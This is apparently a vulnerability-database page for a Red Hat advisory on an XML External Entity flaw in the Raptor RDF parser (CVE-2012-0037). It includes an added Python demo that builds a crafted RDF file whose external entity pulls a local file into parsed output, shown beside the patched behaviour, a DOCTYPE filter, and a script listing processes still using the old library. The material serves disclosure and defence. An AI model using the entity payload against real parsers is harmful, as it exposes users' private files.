Executive Summary
Summary | |
---|---|
Title | raptor security update |
Information | | | |
---|---|---|---|
Name | RHSA-2012:0410 | First vendor publication | 2012-03-22 |
Vendor | Red Hat | Last vendor modification | 2012-03-22 |
Severity (vendor) | Important | Revision | 01 |
Security-Database Scoring CVSS v3
CVSS vector : N/A | | | |
---|---|---|---|
Overall CVSS score | NA | | |
Base score | NA | Environmental score | NA |
Impact subscore | NA | Temporal score | NA |
Exploitability subscore | NA | | |
Security-Database Scoring CVSS v2
CVSS vector : (AV:N/AC:M/Au:N/C:P/I:N/A:N) | | | |
---|---|---|---|
CVSS base score | 4.3 | Attack range | Network |
CVSS impact score | 2.9 | Attack complexity | Medium |
CVSS exploit score | 8.6 | Authentication | None required |
Detail
1. Problem Description:

Updated raptor packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

3. Description:

Raptor provides parsers for Resource Description Framework (RDF) files.

An XML External Entity expansion flaw was found in the way Raptor processed RDF files. If an application linked against Raptor were to open a specially-crafted RDF file, it could possibly allow a remote attacker to obtain a copy of an arbitrary local file that the user running the application had access to. A bug in the way Raptor handled external entities could cause that application to crash or, possibly, execute arbitrary code with the privileges of the user running the application. (CVE-2012-0037)

Red Hat would like to thank Timothy D. Morgan of VSR for reporting this issue.

All Raptor users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications linked against Raptor must be restarted for this update to take effect.

4. Solution:

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258

5. Bugs fixed (http://bugzilla.redhat.com/):

791296 - CVE-2012-0037 raptor: XML External Entity (XXE) attack via RDF files
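The attack the description above outlines, as an added example that is neither Raptor's code nor part of the advisory: an RDF/XML document declares an external general entity pointing at a local file and references it inside a literal, so a parser that resolves external entities copies the file into the parsed data. Python's xml.sax expat reader has the same switch (feature_external_ges), so the unpatched and the fixed behaviour can be shown side by side, together with a pre-parse gate that rejects untrusted RDF carrying an entity-declaring DOCTYPE. The RDF document, the "secret" file, the temp paths and the example resource URL are all constructed for the demo.

```python
"""Added example (not Raptor's code, not from the advisory): the XXE pattern
CVE-2012-0037 describes, reproduced with Python's xml.sax expat reader.

Unpatched Raptor resolved external entities while parsing RDF/XML, so a
crafted document could pull a local file into an RDF literal.  xml.sax has
the same switch (feature_external_ges).  Everything below (the RDF text,
the 'secret' file, the temp paths, the example URL) is constructed here.
"""
import os
import re
import tempfile
import xml.sax
import xml.sax.handler

RDF_NS = "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
DC_NS = "http://purl.org/dc/elements/1.1/"

# RDF/XML has no legitimate use for a DTD, so an entity-declaring DOCTYPE in
# the first 64 KiB is reason enough to refuse the file before any parser
# whose entity handling you do not control gets to see it.
_ENTITY_DOCTYPE = re.compile(rb"<!DOCTYPE[^>\[]*\[.*?<!ENTITY", re.DOTALL)


def build_rdf(title_markup: str, doctype: str = "") -> bytes:
    """Constructed RDF/XML: one resource with a single dc:title literal."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"{doctype}"
        f'<rdf:RDF xmlns:rdf="{RDF_NS}" xmlns:dc="{DC_NS}">\n'
        '  <rdf:Description rdf:about="http://example.invalid/doc">\n'
        f"    <dc:title>{title_markup}</dc:title>\n"
        "  </rdf:Description>\n"
        "</rdf:RDF>\n"
    ).encode()


def build_malicious_rdf(target_path: str) -> bytes:
    """The attacker's file: an external general entity pointing at a local
    file (a file:/// URL works the same way), referenced inside a literal."""
    doctype = f'<!DOCTYPE rdf:RDF [\n  <!ENTITY xxe SYSTEM "{target_path}">\n]>\n'
    return build_rdf("&xxe;", doctype)


class _TitleCollector(xml.sax.handler.ContentHandler):
    """Collects every dc:title literal; leaked file content surfaces here."""

    def __init__(self):
        super().__init__()
        self.titles = []
        self._buf = None

    def startElementNS(self, name, qname, attrs):
        if name == (DC_NS, "title"):
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElementNS(self, name, qname):
        if name == (DC_NS, "title"):
            self.titles.append("".join(self._buf))
            self._buf = None


def rdf_titles(path: str, resolve_external_entities: bool) -> list:
    """Parse an RDF/XML file and return its dc:title literals.

    True reproduces unpatched Raptor (external entities are fetched);
    False, xml.sax's default since Python 3.7.1, is what the fix amounts to."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_namespaces, True)
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    collector = _TitleCollector()
    parser.setContentHandler(collector)
    parser.parse(path)
    return collector.titles


def declares_entities(path: str) -> bool:
    """Pre-parse gate for untrusted RDF: True if the document carries a
    DOCTYPE whose internal subset declares an entity."""
    with open(path, "rb") as f:
        return _ENTITY_DOCTYPE.search(f.read(65536)) is not None


def demo() -> dict:
    """Run the attack against a throwaway 'secret' file, then the fix."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")  # stands in for ~/.netrc etc.
        with open(secret, "w") as f:
            f.write("db_password=hunter2\n")
        evil = os.path.join(tmp, "evil.rdf")
        with open(evil, "wb") as f:
            f.write(build_malicious_rdf(secret))
        clean = os.path.join(tmp, "clean.rdf")
        with open(clean, "wb") as f:
            f.write(build_rdf("Quarterly report"))
        return {
            "leaked": rdf_titles(evil, resolve_external_entities=True)[0],
            "fixed": rdf_titles(evil, resolve_external_entities=False)[0],
            "gate_blocks_evil": declares_entities(evil),
            "gate_passes_clean": declares_entities(clean),
            "clean_title": rdf_titles(clean, resolve_external_entities=False)[0],
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

With external entities on, the dc:title literal comes back holding the secret file's contents; with them off, the same document parses without error and the literal is empty, which is the behaviour a patched library should show. The DOCTYPE gate is the cheap defence for code that must accept RDF from untrusted sources but cannot vouch for every parser in the chain: any application that opened arbitrary RDF through an unpatched Raptor leaked whatever file the crafted document named.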
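The solution section notes that every running application linked against Raptor must be restarted for the update to take effect. The following is an added example, not part of the advisory or of Red Hat's tooling, of how to find those processes on Linux. It assumes that rpm replaces the shared library by unlinking the old inode, so a process that loaded the old copy keeps it mapped and /proc/<pid>/maps shows the path with a trailing " (deleted)". The sample maps text and the library paths in it are constructed.

```python
"""Added example (not part of the advisory or of Red Hat's tooling): list
the processes that still map an old copy of libraptor after the upgrade,
i.e. the ones the advisory says must be restarted.

Assumption (Linux): when rpm replaces a shared library the old inode is
unlinked while running processes keep it mapped, and the kernel then shows
that mapping in /proc/<pid>/maps with a trailing ' (deleted)'.
"""
import os
import re

# /proc/<pid>/maps line: start-end perms offset dev inode [path]
_MAPS_LINE = re.compile(
    r"^[0-9a-f]+-[0-9a-f]+\s+\S+\s+\S+\s+\S+\s+\d+\s*(?P<path>.*)$"
)

# Constructed sample of what a long-running LibreOffice process might show
# after the update: old libraptor unlinked, libraptor2 and libxml2 current.
SAMPLE_MAPS = """\
7f3a1c000000-7f3a1c021000 r-xp 00000000 fd:01 131207 /usr/lib64/libraptor.so.1.0.0 (deleted)
7f3a1c021000-7f3a1c220000 ---p 00021000 fd:01 131207 /usr/lib64/libraptor.so.1.0.0 (deleted)
7f3a1c220000-7f3a1c222000 rw-p 00020000 fd:01 131207 /usr/lib64/libraptor.so.1.0.0 (deleted)
7f3a1c400000-7f3a1c5a0000 r-xp 00000000 fd:01 131300 /usr/lib64/libxml2.so.2.7.6
7f3a1c600000-7f3a1c610000 r-xp 00000000 fd:01 131450 /usr/lib64/libraptor2.so.0.0.0
7f3a1c800000-7f3a1c821000 rw-p 00000000 00:00 0
7ffd9e1f0000-7ffd9e211000 rw-p 00000000 00:00 0 [stack]
"""


def stale_library_mappings(maps_text: str, library: str = "libraptor") -> list:
    """Paths of `library` that a process maps from a file already replaced
    on disk.  Each path is returned once, without the ' (deleted)' suffix."""
    suffix = " (deleted)"
    stale = set()
    for line in maps_text.splitlines():
        m = _MAPS_LINE.match(line)
        if not m:
            continue
        path = m.group("path")
        if not path.endswith(suffix):
            continue
        path = path[: -len(suffix)]
        # Match the soname prefix exactly so libraptor2 is not taken for libraptor.
        if os.path.basename(path).startswith(library + "."):
            stale.add(path)
    return sorted(stale)


def processes_needing_restart(library: str = "libraptor", proc: str = "/proc") -> dict:
    """Scan every readable /proc/<pid>/maps and return {pid: [stale paths]}.
    Run as root to see other users' processes; an absent proc dir yields {}."""
    found = {}
    try:
        entries = os.listdir(proc)
    except OSError:
        return found
    for entry in entries:
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "maps")) as f:
                stale = stale_library_mappings(f.read(), library)
        except OSError:
            continue  # process exited, or not ours to read
        if stale:
            found[int(entry)] = stale
    return found


if __name__ == "__main__":
    print("sample:", stale_library_mappings(SAMPLE_MAPS))
    for pid, libs in processes_needing_restart().items():
        print(pid, *libs)
```

Anything the scan reports is still executing the vulnerable code regardless of what `rpm -q raptor` says, so the package version alone is not evidence that the fix is in effect. On RHEL 6 the needs-restarting tool from yum-utils performs a comparable check across all updated packages.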
Original Source
Url : https://rhn.redhat.com/errata/RHSA-2012-0410.html
CWE : Common Weakness Enumeration
% | Id | Name |
---|---|---|
100 % | CWE-611 | Information Leak Through XML External Entity File Disclosure |
OVAL Definitions
Definition Id: oval:org.mitre.oval:def:15215 | |
---|---|
Title | DSA-2438-1 raptor -- programming error |
Description | It was discovered that Raptor, an RDF parser and serializer library, allows file inclusion through XML entities, resulting in information disclosure. |
Family | unix |
Class | patch |
Reference(s) | DSA-2438-1, CVE-2012-0037 |
Version | 5 |
Platform(s) | Debian GNU/Linux 6.0, Debian GNU/kFreeBSD 6.0 |
Product(s) | raptor |

Definition Id: oval:org.mitre.oval:def:16854 | |
---|---|
Title | USN-1480-1 -- Raptor vulnerability |
Description | Applications using Raptor could be made to expose sensitive information or run programs as your login if they opened a specially crafted file. |
Family | unix |
Class | patch |
Reference(s) | USN-1480-1, CVE-2012-0037 |
Version | 7 |
Platform(s) | Ubuntu 12.04, Ubuntu 11.04, Ubuntu 11.10, Ubuntu 10.04 |
Product(s) | raptor |

Definition Id: oval:org.mitre.oval:def:21265 | |
---|---|
Title | USN-1901-1 -- raptor2 vulnerability |
Description | Applications using Raptor could be made to expose sensitive information or run programs as your login if they opened a specially crafted file. |
Family | unix |
Class | patch |
Reference(s) | USN-1901-1, CVE-2012-0037 |
Version | 5 |
Platform(s) | Ubuntu 12.04 |
Product(s) | raptor2 |

Definition Id: oval:org.mitre.oval:def:21328 | |
---|---|
Title | RHSA-2012:0410: raptor security update (Important) |
Description | Redland Raptor (aka libraptor) before 2.0.7, as used by OpenOffice 3.3 and 3.4 Beta, LibreOffice before 3.4.6 and 3.5.x before 3.5.1, and other products, allows user-assisted remote attackers to read arbitrary files via a crafted XML external entity (XXE) declaration and reference in an RDF document. |
Family | unix |
Class | patch |
Reference(s) | RHSA-2012:0410-01, CESA-2012:0410, CVE-2012-0037 |
Version | 4 |
Platform(s) | Red Hat Enterprise Linux 6, CentOS Linux 6 |
Product(s) | raptor |

Definition Id: oval:org.mitre.oval:def:23828 | |
---|---|
Title | ELSA-2012:0410: raptor security update (Important) |
Description | Redland Raptor (aka libraptor) before 2.0.7, as used by OpenOffice 3.3 and 3.4 Beta, LibreOffice before 3.4.6 and 3.5.x before 3.5.1, and other products, allows user-assisted remote attackers to read arbitrary files via a crafted XML external entity (XXE) declaration and reference in an RDF document. |
Family | unix |
Class | patch |
Reference(s) | ELSA-2012:0410-01, CVE-2012-0037 |
Version | 6 |
Platform(s) | Oracle Linux 6 |
Product(s) | raptor |

Definition Id: oval:org.mitre.oval:def:27837 | |
---|---|
Title | DEPRECATED: ELSA-2012-0410 -- raptor security update (important) |
Description | [1.4.18-5.1] - Fixed XML entity expansion that could lead to information disclosure (CVE-2012-0037). Resolves: rhbz#804496 |
Family | unix |
Class | patch |
Reference(s) | ELSA-2012-0410, CVE-2012-0037 |
Version | 4 |
Platform(s) | Oracle Linux 6 |
Product(s) | raptor |
OpenVAS Exploits
Date | Name | File |
---|---|---|
2012-09-26 | Gentoo Security Advisory GLSA 201209-05 (libreoffice) | nvt/glsa_201209_05.nasl |
2012-08-30 | Fedora Update for raptor FEDORA-2012-10591 | nvt/gb_fedora_2012_10591_raptor_fc17.nasl |
2012-08-30 | Fedora Update for raptor2 FEDORA-2012-4629 | nvt/gb_fedora_2012_4629_raptor2_fc17.nasl |
2012-08-03 | Fedora Update for raptor FEDORA-2012-10590 | nvt/gb_fedora_2012_10590_raptor_fc16.nasl |
2012-08-03 | Mandriva Update for raptor MDVSA-2012:061 (raptor) | nvt/gb_mandriva_MDVSA_2012_061.nasl |
2012-08-03 | Mandriva Update for libreoffice MDVSA-2012:063 (libreoffice) | nvt/gb_mandriva_MDVSA_2012_063.nasl |
2012-07-30 | CentOS Update for raptor CESA-2012:0410 centos6 | nvt/gb_CESA-2012_0410_raptor_centos6.nasl |
2012-07-30 | CentOS Update for openoffice.org-base CESA-2012:0411 centos5 | nvt/gb_CESA-2012_0411_openoffice.org-base_centos5.nasl |
2012-07-09 | RedHat Update for raptor RHSA-2012:0410-01 | nvt/gb_RHSA-2012_0410-01_raptor.nasl |
2012-06-19 | Ubuntu Update for raptor USN-1480-1 | nvt/gb_ubuntu_USN_1480_1.nasl |
2012-04-30 | Debian Security Advisory DSA 2438-1 (raptor) | nvt/deb_2438_1.nasl |
2012-04-30 | FreeBSD Ports: raptor2 | nvt/freebsd_raptor2.nasl |
2012-04-13 | Fedora Update for raptor2 FEDORA-2012-4663 | nvt/gb_fedora_2012_4663_raptor2_fc16.nasl |
Nessus® Vulnerability Scanner
Date | Name | File | Type |
---|---|---|---|
2014-09-01 | The remote Gentoo host is missing one or more security-related patches. | gentoo_GLSA-201408-19.nasl | ACT_GATHER_INFO |
2014-06-13 | The remote openSUSE host is missing a security update. | openSUSE-2012-187.nasl | ACT_GATHER_INFO |
2014-06-13 | The remote openSUSE host is missing a security update. | openSUSE-2012-183.nasl | ACT_GATHER_INFO |
2013-07-12 | The remote Oracle Linux host is missing one or more security updates. | oraclelinux_ELSA-2012-0410.nasl | ACT_GATHER_INFO |
2013-07-09 | The remote Ubuntu host is missing a security-related patch. | ubuntu_USN-1901-1.nasl | ACT_GATHER_INFO |
2012-12-14 | The remote host has an application installed that is affected by multiple vul... | lotus_symphony_3_0_1_fp2.nasl | ACT_GATHER_INFO |
2012-09-25 | The remote Gentoo host is missing one or more security-related patches. | gentoo_GLSA-201209-05.nasl | ACT_GATHER_INFO |
2012-09-06 | The remote Mandriva Linux host is missing one or more security updates. | mandriva_MDVSA-2012-063.nasl | ACT_GATHER_INFO |
2012-08-01 | The remote Scientific Linux host is missing one or more security updates. | sl_20120322_raptor_on_SL6_x.nasl | ACT_GATHER_INFO |
2012-08-01 | The remote Scientific Linux host is missing one or more security updates. | sl_20120322_openoffice_org_on_SL5_x.nasl | ACT_GATHER_INFO |
2012-07-31 | The remote Fedora host is missing a security update. | fedora_2012-10591.nasl | ACT_GATHER_INFO |
2012-07-31 | The remote Fedora host is missing a security update. | fedora_2012-10590.nasl | ACT_GATHER_INFO |
2012-06-19 | The remote Ubuntu host is missing a security-related patch. | ubuntu_USN-1480-1.nasl | ACT_GATHER_INFO |
2012-04-23 | The remote Mandriva Linux host is missing one or more security updates. | mandriva_MDVSA-2012-061.nasl | ACT_GATHER_INFO |
2012-04-13 | The remote Fedora host is missing a security update. | fedora_2012-4663.nasl | ACT_GATHER_INFO |
2012-04-12 | The remote host is running an application affected by a data leakage vulnerab... | openoffice_2012_0037.nasl | ACT_GATHER_INFO |
2012-04-12 | The remote SuSE 11 host is missing one or more security updates. | suse_11_libreoffice-345-120316.nasl | ACT_GATHER_INFO |
2012-04-12 | The remote host is running an application affected by a data leakage vulnerab... | macosx_libreoffice_351.nasl | ACT_GATHER_INFO |
2012-04-12 | The remote host is running an application affected by a data leakage vulnerab... | libreoffice_351.nasl | ACT_GATHER_INFO |
2012-04-12 | The remote Fedora host is missing a security update. | fedora_2012-4629.nasl | ACT_GATHER_INFO |
2012-04-03 | The remote SuSE 10 host is missing a security-related patch. | suse_libreoffice-345-8022.nasl | ACT_GATHER_INFO |
2012-03-26 | The remote CentOS host is missing one or more security updates. | centos_RHSA-2012-0410.nasl | ACT_GATHER_INFO |
2012-03-26 | The remote SuSE 11 host is missing one or more security updates. | suse_11_libraptor-devel-120217.nasl | ACT_GATHER_INFO |
2012-03-26 | The remote FreeBSD host is missing one or more security-related updates. | freebsd_pkg_60f81af3769011e1942300235a5f2c9a.nasl | ACT_GATHER_INFO |
2012-03-26 | The remote CentOS host is missing one or more security updates. | centos_RHSA-2012-0411.nasl | ACT_GATHER_INFO |
2012-03-23 | The remote Red Hat host is missing one or more security updates. | redhat-RHSA-2012-0411.nasl | ACT_GATHER_INFO |
2012-03-23 | The remote Red Hat host is missing one or more security updates. | redhat-RHSA-2012-0410.nasl | ACT_GATHER_INFO |
2012-03-23 | The remote Debian host is missing a security-related update. | debian_DSA-2438.nasl | ACT_GATHER_INFO |
Alert History
Date | Information |
---|---|
2014-02-17 11:55:48 | |
2013-04-19 13:22:04 | |